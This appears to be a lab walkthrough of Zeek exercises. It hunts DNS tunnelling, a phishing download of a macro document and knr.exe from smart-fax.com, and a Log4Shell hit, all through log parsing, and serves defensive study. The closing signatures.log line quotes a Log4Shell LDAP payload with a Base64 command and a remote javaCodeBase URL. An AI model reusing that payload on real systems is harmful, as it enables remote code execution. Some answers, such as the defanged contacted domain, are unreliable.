ZEEK EXERCISES

ANOMALOUS DNS

Investigate the dns-tunneling.pcap file. Investigate the dns.log file. What is the number of DNS records linked to the IPv6 address?

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head dns.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	trans_idrtt	query	qclass	qclass_name	qtype	qtype_name	rcode	rcode_name	AA	TC	RD	RA	Z	answers	TTLs	rejected
 #types	time	string	addr	port	addr	port	enum	count	interval	string	count	string	count	string	count	string	bool	bool	bool	bool	count	vector[string]	vector[interval]	bool
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	5374	0.855652	e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com	1	C_INTERNET	15	MX	0	NOERROR	F	F	T	T	0	3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com	58.000000	F

root@thm:~$ cat dns.log | zeek-cut qtype_name
 TXT
 CNAME
 MX
 AAAA
 ...

root@thm:~$ cat dns.log | zeek-cut qtype_name | grep AAAA | wc -l
 320

Investigate the dns-tunneling.pcap file. Investigate the conn.log file. What is the longest connection duration?

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head conn.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	service	duration	orig_bytes	resp_bytes	conn_state	local_orig	local_resp	missed_bytes	history	orig_pkts	orig_ip_bytes	resp_pkts	resp_ip_bytes	tunnel_parents
 #types	time	string	addr	port	addr	port	enum	string	interval	count	count	string	bool	bool	count	string	count	count	count	count	set[string]
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	dns	0.855652	80	175	SF	-	-	0	Dd	1	108	1	203-
 1623212925.678141	CglDT21NBa0XUHywyl	10.20.57.3	47888	10.10.2.22	53	udp	dns	0.158643	80	175	SF	-	-	0	Dd	1	108	1	203-

root@thm:~$ cat conn.log | zeek-cut duration
 0.658508
 0.360476
 0.039498
 ...

root@thm:~$ cat conn.log | zeek-cut duration | sort -n
 3.445874
 4.238265
 7.835490
 9.420791

Investigate the dns-tunneling.pcap file. Investigate the dns.log file. Filter all unique DNS queries. What is the number of unique domain queries?

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head dns.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	trans_idrtt	query	qclass	qclass_name	qtype	qtype_name	rcode	rcode_name	AA	TC	RD	RA	Z	answers	TTLs	rejected
 #types	time	string	addr	port	addr	port	enum	count	interval	string	count	string	count	string	count	string	bool	bool	bool	bool	count	vector[string]	vector[interval]	bool
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	5374	0.855652	e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com	1	C_INTERNET	15	MX	0	NOERROR	F	F	T	T	0	3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com	58.000000	F

root@thm:~$ cat dns.log | zeek-cut query
 db.rhodes.edu
 4542016cb16eb15fd56e1b16c4545111d7.cisco-update.com
 ...

root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq
 _tcp.local
 cisco-update.com
 in-addr.arpa
 ip6.arpa
 rhodes.edu
 ubuntu.com
 
root@thm:~$ cat dns.log | zeek-cut query |rev | cut -d '.' -f 1-2 | rev | sort | uniq | wc -l
 6

Investigate the dns-tunneling.pcap file. There are a massive amount of DNS queries sent to the same domain. This is abnormal. Let's find out which hosts are involved in this activity. Investigate the conn.log file. What is the IP address of the source host?

root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap
 
root@thm:~$ zeek -C -r dns-tunneling.pcap 
root@thm:~$ ls
 clear-logs.sh  dns-tunneling.pcap  http.log  packet_filter.log
 conn.log       dns.log             ntp.log

root@thm:~$ head conn.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	proto	service	duration	orig_bytes	resp_bytes	conn_state	local_orig	local_resp	missed_bytes	history	orig_pkts	orig_ip_bytes	resp_pkts	resp_ip_bytes	tunnel_parents
 #types	time	string	addr	port	addr	port	enum	string	interval	count	count	string	bool	bool	count	string	count	count	count	count	set[string]
 1623212924.825154	CcJ7pk2dFfkLv8WXfe	10.20.57.3	59580	10.10.2.22	53	udp	dns	0.855652	80	175	SF	-	-	0	Dd	1	108	1	203-
 1623212925.678141	CglDT21NBa0XUHywyl	10.20.57.3	47888	10.10.2.22	53	udp	dns	0.158643	80	175	SF	-	-	0	Dd	1	108	1	203-

root@thm:~$ cat conn.log | zeek-cut id.orig_h
 10.20.57.3
 10.20.57.3
 ...

root@thm:~$ cat conn.log | zeek-cut id.orig_h | sort | uniq
 10.20.57.3
 fe80::202a:f0b1:7d9c:bd9e

PHISHING

Investigate the logs. What is the suspicious source address? Enter your answer in defanged format.

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CLYI4E3rTcU5VAMw51	HTTP	0	(empty)	text/plain	-	0.000000	-	F	14	14	0	0F-	-	-	-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	C0Bg3l4Y4wO1g2JNbl	HTTP	0	(empty)	application/msword	-	4.386569	-	F	323072	-	00F	-	-	-	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	COY5YG1s9ZuflGNT48	HTTP	0	PE	application/x-dosexec	-	0.498764	-	F	2437120	-	00F	-	-	-	-	-	-	-

root@thm:~$ cat files.log | zeek-cut tx_hosts rx_hosts mime_type filename
 23.63.254.163	10.6.27.102	text/plain	-
 107.180.50.162	10.6.27.102	application/msword	-
 107.180.50.162	10.6.27.102	application/x-dosexec	-

 * the online application that may look suspicious at first glance is the executable file

root@thm~:$ BROWSER > https://gchq.github.io/
 input: 10.6.27.102
 recipe: defang ip addresses
 output: 10[.]6[.]27[.]102

Investigate the http.log file. Which domain address were the malicious files downloaded from? Enter your answer in defanged format.

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ BROWSER > https://gchq.github.io/
 input: smart-fax.com
 recipe: defang url
 output: smart-fax[.]com

Investigate the malicious document in VirusTotal. What kind of file is associated with the malicious document?

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: b5243ec1df7d1d5304189e7db2744128
 relations > bundled files
  Bundled Files (41)
  Scanned     Detections     File type     Name
  2024-11-04  10/61          VBA           ThisDocument.cls
  2024-05-23   6/63          VBA
  2024-12-23   0/61          Text          PROJECTwm
  2024-11-08   0/62          ?             [1]CompObj
  2024-12-06   0/62          Text          VBA_P-code.txt

Investigate the extracted malicious .exe file. What is the given file name in Virustotal?

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: cc28e40b46237ab6d5282199ef78c464
 detection: 
  749e161661290e8a2d190b1a66469744127bc25bf46e5d0c6f2e835f4b92db18
  PleaseWaitWindow.exe

Investigate the malicious .exe file in VirusTotal. What is the contacted domain name? Enter your answer in defanged format.

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

root@thm~:$ zeek -C -r phishing.pcap hash-demo.zeek
 * there will be new hashed fields the files.log file
 
root@thm:~$ cat files.log
 #fields	ts	fuid	tx_hosts	rx_hosts	conn_uids	source	depth	analyzers	mime_type	filename	duration	local_orig	is_orig	seen_bytes	total_bytes	missing_bytes	overflow_bytes	timedout	parent_fuid	md5	sha1	sha256	extracted	extracted_cutoff	extracted_size
 #types	time	string	set[addr]	set[addr]	set[string]	string	count	set[string]	string	string	interval	bool	bool	count	count	count	count	bool	string	string	string	string	string	bool	count
 1561667874.743959	Fpgan59p6uvNzLFja	23.63.254.163	10.6.27.102	CI5U2K3Zk6D31MnLp8	HTTP	0	SHA1,MD5	text/plain	-	0.000000	-	F	14	14	00	F	-	cd5a4d3fdd5bffc16bf959ef75cf37bc	33bf88d5b82df3723d5863c7d23445e345828904-	-	-	-
 1561667889.703239	FB5o2Hcauv7vpQ8y3	107.180.50.162	10.6.27.102	Ch8wOn2b7M249xNQ12	HTTP	0	SHA1,MD5	application/msword	-	4.386569	-	F	323072	-0	0	F	-	b5243ec1df7d1d5304189e7db2744128	a66bd2557016377dfb95a87c21180e52b23d2e4e	-	-	-	-
 1561667899.060086	FOghls3WpIjKpvXaEl	107.180.50.162	10.6.27.102	Ce5njOG0IJsxzOL08	HTTP	0	SHA1,MD5,PE	application/x-dosexec	-	0.498764	-	F	2437120-0	0	F	-	cc28e40b46237ab6d5282199ef78c464	0d5c820002cf93384016bd4a2628dcc5101211f4	-	-	-	-

#correlate the fuid w/ the uid of the file found in the http.log
#/knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
#/Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
 text/plain	cd5a4d3fdd5bffc16bf959ef75cf37bc
 application/msword	b5243ec1df7d1d5304189e7db2744128
 application/x-dosexec	cc28e40b46237ab6d5282199ef78c464

root@thm:~$ BROWSER > https://www.virustotal.com/
 search: cc28e40b46237ab6d5282199ef78c464
 behavior > dns resolutiona
  DNS Resolutions
   dunlop.hopto.org
   query.prod.cms.rt.microsoft.com
   res.public.onecdn.static.microsoft
   www.microsoft.com
   125.21.88.13.in-addr.arpa
   
root@thm:~$ BROWSER > cyberchef.io
 input: hopto.org
 recipe: defang url
 output: hopto[.]org

Investigate the http.log file. What is the request name of the downloaded malicious .exe file?

root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
 clear-logs.sh  file-extract-demo.zeek  hash-demo.zeek  phishing.pcap
 
root@thm:~$ cat file-extract-demo.zeek
 # Load file extract framework!
 @load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
 
root@thm:~$ cat hash-demo.zeek
 # Enable MD5, SHA1 and SHA256 hashing for all files.
 @load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
 
root@thm:~$ zeek -C -r phishing.pcap 
root@thm:~$ ls
 clear-logs.sh  conn.log  dhcp.log  dns.log  file-extract-demo.zeek  files.log  hash-demo.zeek  http.log

root@thm:~$ cat http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1561667874.713411	CLYI4E3rTcU5VAMw51	10.6.27.102	49157	23.63.254.163	80	1	GET	www.msftncsi.com	/ncsi.txt	-	1.1	Microsoft NCSI	-	0	14	200	OK	-	-	(empty)	-	-	-	-	-	-	Fpgan59p6uvNzLFja	-	text/plain
 1561667889.643717	C0Bg3l4Y4wO1g2JNbl	10.6.27.102	49159	107.180.50.162	80	1	GET	smart-fax.com	/Documents/Invoice&MSO-Request.doc	-	1.1	Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko	-	0	323072	200	OK	-	-	(empty)	-	-	-	-	-	-	FB5o2Hcauv7vpQ8y3	-	application/msword
 1561667898.911759	COY5YG1s9ZuflGNT48	10.6.27.102	49162	107.180.50.162	80	1	GET	smart-fax.com	/knr.exe	-	1.1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	-	0	2437120	200	OK	-	-	(empty)	-	---	-	-	FOghls3WpIjKpvXaEl	-	application/x-dosexec

 * the malicious file could be the /knr.exe

root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
 10.6.27.102	www.msftncsi.com	/ncsi.txt
 10.6.27.102	smart-fax.com	/Documents/Invoice&MSO-Request.doc
 10.6.27.102	smart-fax.com	/knr.exe

LOG4J

Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the signature.log file. What is the number of signature hits?

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ cat signatures.log
 #fields	ts	uid	src_addr	src_port	dst_addr	dst_port	note	sig_id	event_msg	sub_msg	sig_count	host_count
 #types	time	string	addr	port	addr	port	enum	string	string	string	count	count
 1640023652.109820	CMzs07mEkv4GvJc68	192.168.56.102	389	172.17.0.2	36820	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xc8\x02\x01\x02d\x81\xc2\x04-Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04\x0bobjectC...	-	-
